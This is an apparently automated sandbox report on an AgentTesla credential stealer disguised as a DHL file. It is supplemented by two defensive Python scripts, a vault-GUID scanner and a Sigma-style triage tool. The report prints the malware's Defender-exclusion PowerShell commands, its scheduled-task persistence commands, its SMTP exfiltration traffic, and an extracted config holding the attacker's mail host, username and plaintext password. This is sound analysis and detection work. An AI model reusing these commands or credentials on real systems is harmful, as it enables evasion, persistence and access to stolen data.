Windows Analysis Report
DHL_231437894819.bat.exe

Overview

General Information

Sample name: DHL_231437894819.bat.exe
Analysis ID: 1578149
MD5: 5d1d0f26ebb26738d78e964c0a57de2d
SHA1: 392ed434f12587a91368fb253f75fd6dffbf25ea
SHA256: c01469ec1500b5bbb7ace40f1823b41e0965607d4fa54497f3dff82712c8070a
Tags: exe, user-TeamDreier

Detection

AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL_231437894819.bat.exe (PID: 7972 cmdline: "C:\Users\user\Desktop\DHL_231437894819.bat.exe" MD5: 5D1D0F26EBB26738D78E964C0A57DE2D)
    • powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1452 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7660 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • uvbIwIYe.exe (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\uvbIwIYe.exe MD5: 5D1D0F26EBB26738D78E964C0A57DE2D)
    • schtasks.exe (PID: 2220 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 2788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.keeptraveling-eg.com", "Username": "donia@keeptraveling-eg.com", "Password": "Do76#Zbbdonia"}
Yara matches in the network capture (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches in memory dumps (Source | Rule | Description | Author):
0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(21 entries in total; only the first five are shown here)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
10.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
10.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Matched strings:
  • 0x34173:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x341e5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3426f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x34301:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3436b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x343dd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34473:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34503:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(27 entries in total; only the first five are shown here)
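The vault-schema rule above fires on eight GUID strings inside the unpacked RegSvcs.exe image, which is a useful standalone check when a sample is unpacked by hand and Yara is not at hand. The script below is an added example, not Joe Security's or ditekSHen's code: it searches a memory dump or unpacked PE for those same eight GUIDs in both ASCII and UTF-16LE (the encoding .NET keeps its user strings in) and lists hits in the same offset:$sN shape as the Yara output. The input blob is constructed, and the three-distinct-GUID threshold is an assumption for this example, since the rule's real condition is not shown on this page.

```python
"""Search an unpacked PE / memory dump for Windows Vault schema GUID strings.

Added example, not Joe Security's or ditekSHen's code.  It mirrors what the
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID match above reports: the eight GUIDs
the rule's $s1..$s8 strings hit are searched in ASCII and UTF-16LE (the
encoding .NET stores user strings in), and hits are listed as offset:$sN
like the Yara output.  The threshold of three distinct GUIDs is an
assumption for this example; the rule's real condition is not shown here.
"""
from __future__ import annotations

import re

# The eight GUID strings reported by the rule match above.
VAULT_SCHEMA_GUIDS = [
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5",
    "3CCD5499-87A8-4B10-A215-608888DD3B55",
    "154E23D0-C644-4E6F-8CE6-5069272F999F",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548",
]
MIN_DISTINCT_GUIDS = 3  # assumption: the rule's condition is not on the page


def find_vault_guids(data: bytes) -> dict[str, list[tuple[int, str]]]:
    """Return {guid: [(offset, encoding), ...]} for every GUID present.

    Case-insensitive so lower-cased copies are caught too; bytes-mode
    re.IGNORECASE folds ASCII letters, which also covers the UTF-16LE form
    because each code unit is an ASCII byte followed by 0x00.
    """
    hits: dict[str, list[tuple[int, str]]] = {}
    for guid in VAULT_SCHEMA_GUIDS:
        found = []
        for encoding in ("ascii", "utf-16-le"):
            needle = re.compile(re.escape(guid.encode(encoding)), re.IGNORECASE)
            found += [(m.start(), encoding) for m in needle.finditer(data)]
        if found:
            hits[guid] = sorted(found)
    return hits


def classify(data: bytes) -> tuple[bool, int]:
    """(is_match, distinct_guid_count) using the assumed threshold."""
    n = len(find_vault_guids(data))
    return n >= MIN_DISTINCT_GUIDS, n


def format_hits(hits: dict[str, list[tuple[int, str]]]) -> list[str]:
    """Render hits in the same 'offset:$sN: GUID' shape as the Yara output."""
    lines = []
    for i, guid in enumerate(VAULT_SCHEMA_GUIDS, start=1):
        for offset, encoding in hits.get(guid, []):
            lines.append(f"0x{offset:x}:$s{i}: {guid} ({encoding})")
    return lines


def build_sample_blob() -> bytes:
    """Constructed input, not a real dump: filler bytes with four GUIDs
    embedded as UTF-16LE user strings and one extra lower-case ASCII copy."""
    filler = bytes(range(256)) * 4          # 1024 bytes that match nothing
    parts = [filler]
    for guid in VAULT_SCHEMA_GUIDS[:4]:
        parts.append(guid.encode("utf-16-le"))
        parts.append(b"\x00" * 16)
    parts.append(VAULT_SCHEMA_GUIDS[0].lower().encode("ascii"))
    parts.append(filler)
    return b"".join(parts)


if __name__ == "__main__":
    blob = build_sample_blob()
    matched, count = classify(blob)
    print(f"match={matched} distinct_guids={count}")
    for line in format_hits(find_vault_guids(blob)):
        print(line)
```

Run it against a real `.unpack` file by replacing `build_sample_blob()` with `open(path, "rb").read()`. Searching the UTF-16LE form matters for .NET samples like this one: the report's hit offsets are roughly 0x70 to 0x90 apart, which is what 36-character wide strings separated by short metadata look like, and an ASCII-only search would miss them.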

                      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ProcessId: 7448, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uvbIwIYe.exe, ParentImage: C:\Users\user\AppData\Roaming\uvbIwIYe.exe, ParentProcessId: 7856, ParentProcessName: uvbIwIYe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp", ProcessId: 2220, ProcessName: schtasks.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 162.241.224.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49713
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", ProcessId: 7660, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ProcessId: 7448, ProcessName: powershell.exe

                      Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", ProcessId: 7660, ProcessName: schtasks.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T10:28:23.030175+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
2024-12-19T10:28:51.558509+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
2024-12-19T10:28:51.558509+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
2024-12-19T10:28:23.030175+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
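The Sigma and Suricata matches above reduce to three host-observable behaviours: a PowerShell Add-MpPreference exclusion (the report also flags the base64-encoded form of the same cmdlet), a scheduled task registered from an XML file staged in a temp folder, and an outbound SMTP connection from RegSvcs.exe, a .NET framework utility that never legitimately sends mail. The script below is an added example, not Joe Security's or the Sigma project's code: it restates those checks in plain Python over constructed Sysmon-style events built from the command lines and the port-587 connection shown in this report, plus two benign controls and one encoded variant. The temp-folder patterns and the list of no-mail processes are assumptions to be tuned per environment.

```python
"""Behavioural triage over process-creation and network events.

Added example, not Joe Security's or the Sigma project's code.  It restates
in plain Python what the Sigma and Suricata matches above key on: a
PowerShell Add-MpPreference exclusion (including the -EncodedCommand form
the base64 rule covers), a scheduled task created from an XML file in a
temp folder, and an outbound SMTP connection from a process that has no
business sending mail.  Events are constructed from the command lines and
the connection shown in this report plus benign controls; the temp paths
and the no-mail process list are assumptions to tune per environment.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

SMTP_PORTS = {25, 465, 587}
# Assumption: .NET framework utilities that never legitimately originate SMTP.
NO_MAIL_PROCESSES = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# Assumption: temp locations a task XML should never be staged from.
TEMP_DIRS = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%", re.I)
DEFENDER_EXCLUSION = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)", re.I)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
XML_ARG = re.compile(r'/xml\s+"?([^"\s]+)', re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def expand_encoded(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE) so the plain
    keyword checks see it; leaves cmd alone when absent or undecodable."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd


def check_process(ev: dict) -> list[Finding]:
    image = ev.get("Image", "").lower()
    cmd = expand_encoded(ev.get("CommandLine", ""))
    findings = []
    if image.endswith("powershell.exe") and DEFENDER_EXCLUSION.search(cmd):
        findings.append(Finding("defender_exclusion_via_powershell", ev["ProcessId"], cmd))
    xml = XML_ARG.search(cmd)
    if (image.endswith("schtasks.exe") and "/create" in cmd.lower()
            and xml and TEMP_DIRS.search(xml.group(1))):
        findings.append(Finding("schtasks_xml_from_temp", ev["ProcessId"], xml.group(1)))
    return findings


def check_network(ev: dict) -> list[Finding]:
    if ev.get("Protocol") != "tcp" or not ev.get("Initiated"):
        return []
    port = int(ev["DestinationPort"])
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if port in SMTP_PORTS and image in NO_MAIL_PROCESSES:
        return [Finding("smtp_from_non_mail_process", ev["ProcessId"],
                        f"{image} -> {ev['DestinationIp']}:{port}")]
    return []


def triage(events: list[dict]) -> list[Finding]:
    out: list[Finding] = []
    for ev in events:
        out += check_process(ev) if ev["type"] == "process" else check_network(ev)
    return out


def _encoded(script: str) -> str:
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events (Sysmon-style field names): report command lines plus controls.
SAMPLE_EVENTS = [
    {"type": "process", "ProcessId": 7448,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"'},
    {"type": "process", "ProcessId": 7660,
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"'},
    {"type": "network", "ProcessId": 7048,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "162.241.224.14", "DestinationPort": 587},
    # Constructed: the second exclusion from the report hidden behind -enc.
    {"type": "process", "ProcessId": 7560,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -enc " + _encoded(
         r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"')},
    # Constructed benign controls: task XML outside temp, SMTP from a mail client.
    {"type": "process", "ProcessId": 4242, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"'},
    {"type": "network", "ProcessId": 4343,
     "Image": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "203.0.113.25", "DestinationPort": 587},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Two details carry the weight here. The exclusion check runs on the command line after any `-EncodedCommand` payload has been base64-decoded from UTF-16LE, which is the gap the "Base64 Encoded MpPreference Cmdlet" rule exists to close. The SMTP check keys on the originating image rather than the port alone, because port 587 from a mail client is normal while port 587 from RegSvcs.exe, as seen in this report, is the injected payload exfiltrating.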

                      AV Detection

Source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.keeptraveling-eg.com", "Username": "donia@keeptraveling-eg.com", "Password": "Do76#Zbbdonia"}
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe; ReversingLabs: Detection: 71%
Source: DHL_231437894819.bat.exe; VirusTotal: Detection: 65%
Source: DHL_231437894819.bat.exe; ReversingLabs: Detection: 71%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe; Joe Sandbox ML: detected
Source: DHL_231437894819.bat.exe; Joe Sandbox ML: detected
Source: DHL_231437894819.bat.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49714 version: TLS 1.2
Source: DHL_231437894819.bat.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

Source: Network traffic; Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.10:49718 -> 162.241.224.14:587
Source: Network traffic; Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.10:49718 -> 162.241.224.14:587
Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.10:49718 -> 162.241.224.14:587
Source: Network traffic; Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.10:49718 -> 162.241.224.14:587
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.10:49713 -> 162.241.224.14:587 (seen 2 times)
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive (seen 4 times)
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: api.ipify.org (seen 2 times)
Source: unknown; DNS query: name: ip-api.com
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive (seen 4 times)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (seen 3 times)
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: mail.keeptraveling-eg.com
Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.dr; String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.dr; String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 0000000A.00000002.1539589797.0000000006036000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E21000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E21000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.keeptraveling-eg.com
Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.dr; String found in binary or memory: http://ocsp.comodoca.com0
